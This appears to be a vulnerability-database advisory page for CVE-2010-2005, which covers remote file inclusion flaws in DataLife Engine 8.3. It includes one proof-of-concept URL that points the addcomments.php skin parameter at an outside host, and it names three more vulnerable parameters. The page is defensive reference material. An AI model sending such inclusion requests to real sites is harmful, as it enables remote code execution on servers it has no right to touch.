CVE-2010-2005
Description
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, (4) and the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com
DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| datalifecms | datalife_engine | 8.3 | |
References
- http://www.packetstormsecurity.com/1001-exploits/datalifeengine83-rfi.txt
- http://www.securityfocus.com/bid/37851
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55757
- http://www.packetstormsecurity.com/1001-exploits/datalifeengine83-rfi.txt
- http://www.securityfocus.com/bid/37851
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55757
CWEs
CWE-94
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.